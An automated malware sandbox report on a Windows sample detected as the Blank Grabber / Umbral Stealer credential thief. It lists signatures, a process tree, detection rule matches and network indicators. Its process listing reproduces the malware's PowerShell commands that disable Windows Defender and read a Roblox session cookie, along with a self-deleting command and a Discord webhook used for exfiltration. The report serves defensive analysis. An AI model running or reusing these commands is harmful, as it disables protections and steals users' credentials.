Windows Analysis Report
IDLBk4XMUa.exe

Overview

General Information

Sample name: IDLBk4XMUa.exe (renamed because the original name is a hash value)
Original sample name: 0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb.exe
Analysis ID: 1487993
MD5: ae3713305401315a3b520e84fb786fe5
SHA1: 914bd258c204e4cddab9dc0dbfb9c7134659ad57
SHA256: 0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb
Tags: exe

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • IDLBk4XMUa.exe (PID: 5076 cmdline: "C:\Users\user\Desktop\IDLBk4XMUa.exe" MD5: AE3713305401315A3B520E84FB786FE5)
    • WMIC.exe (PID: 2144 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7392 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7436 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7616 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7696 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7820 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8040 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1648 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7180 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7404 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6328 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7720 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5500 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7792 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware configuration (Umbral Stealer):
{"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}

Yara matches (sample):
  • Source: IDLBk4XMUa.exe; Rule: JoeSecurity_BlankGrabber; Description: Yara detected Blank Grabber; Author: Joe Security
  • Source: IDLBk4XMUa.exe; Rule: JoeSecurity_UmbralStealer; Description: Yara detected Umbral Stealer; Author: Joe Security
  • Source: IDLBk4XMUa.exe; Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice; Description: Detects executables attempting to enumerate video devices using WMI; Author: ditekSHen; Strings:
    • 0x31890:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
    • 0x31a16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
    • 0x31ab2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Yara matches (dropped files):
  • Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr; Rule: JoeSecurity_BlankGrabber; Description: Yara detected Blank Grabber; Author: Joe Security
  • Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr; Rule: JoeSecurity_UmbralStealer; Description: Yara detected Umbral Stealer; Author: Joe Security
  • Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr; Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice; Description: Detects executables attempting to enumerate video devices using WMI; Author: ditekSHen; Strings:
    • 0x31890:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
    • 0x31a16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
    • 0x31ab2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Yara matches (memory dumps):
  • Source: 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_BlankGrabber; Description: Yara detected Blank Grabber; Author: Joe Security
  • Source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp; Rule: JoeSecurity_BlankGrabber; Description: Yara detected Blank Grabber; Author: Joe Security
  • Source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp; Rule: JoeSecurity_UmbralStealer; Description: Yara detected Umbral Stealer; Author: Joe Security
  • Source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_BlankGrabber; Description: Yara detected Blank Grabber; Author: Joe Security
  • Source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security

Yara matches (unpacked PEs):
  • Source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack; Rule: JoeSecurity_BlankGrabber; Description: Yara detected Blank Grabber; Author: Joe Security
  • Source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack; Rule: JoeSecurity_UmbralStealer; Description: Yara detected Umbral Stealer; Author: Joe Security
  • Source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice; Description: Detects executables attempting to enumerate video devices using WMI; Author: ditekSHen; Strings:
    • 0x31890:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
    • 0x31a16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
    • 0x31ab2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

System Summary

Sigma rule matches:
  • Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', ProcessId: 7436, ProcessName: powershell.exe
  • Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7696, ProcessName: powershell.exe
  • Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
  • Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', ProcessId: 7436, ProcessName: powershell.exe
  • Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
  • Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
  • Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
  • Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', ProcessId: 7436, ProcessName: powershell.exe

Network IDS alerts:
  • Timestamp: 2024-08-05T14:58:58.214926+0200; SID: 2045593; Source Port: 49707; Destination Port: 443; Protocol: TCP; Classtype: A Network Trojan was detected
  • Timestamp: 2024-08-05T14:58:38.291208+0200; SID: 2803305; Source Port: 49705; Destination Port: 80; Protocol: TCP; Classtype: Unknown Traffic

AV Detection

Source: IDLBk4XMUa.exe; Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr; Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: IDLBk4XMUa.exe; Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr; ReversingLabs: Detection: 81%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr; Virustotal: Detection: 86%
Source: IDLBk4XMUa.exe; Virustotal: Detection: 86%
Source: IDLBk4XMUa.exe; ReversingLabs: Detection: 81%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr; Joe Sandbox ML: detected
Source: IDLBk4XMUa.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Code function: 0_2_00007FFAACEA3743 CryptUnprotectData, 0_2_00007FFAACEA3743
Source: IDLBk4XMUa.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: IDLBk4XMUa.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Malware configuration extractor; URLs: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping localhost
Source: Yara match; File source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; IP Address: 162.159.138.232
Source: Joe Sandbox View; ASN Name: TUT-ASUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: ip-api.com
Source: unknown; DNS query: name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: ptb.discord.com
Source: unknown; HTTP traffic detected: POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1 | Accept: application/json | User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 | Content-Type: application/json; charset=utf-8 | Host: ptb.discord.com | Content-Length: 939 | Expect: 100-continue | Connection: Keep-Alive
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: IDLBk4XMUa.exe, NcIxl.scr.0.dr; String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: IDLBk4XMUa.exe, NcIxl.scr.0.dr; String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ptb.discord.com
Source: powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7425000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000017.00000002.1609749890.00000268E4994000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A745C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex=
Source: powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: NcIxl.scr.0.dr; String found in binary or memory: https://discord.com/api/v10/users/
Source: IDLBk4XMUa.exe, NcIxl.scr.0.dr; String found in binary or memory: https://discordapp.com/api/v9/users/
Source: NcIxl.scr.0.dr; String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://gstatic.com
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://gstatic.com/generate_204
Source: IDLBk4XMUa.exe, NcIxl.scr.0.dr; String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://media.discordapp.net/attachments/1193832993945563176/12700031
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://media.discordapp.net/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?e
Source: powershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ptb.discord.com
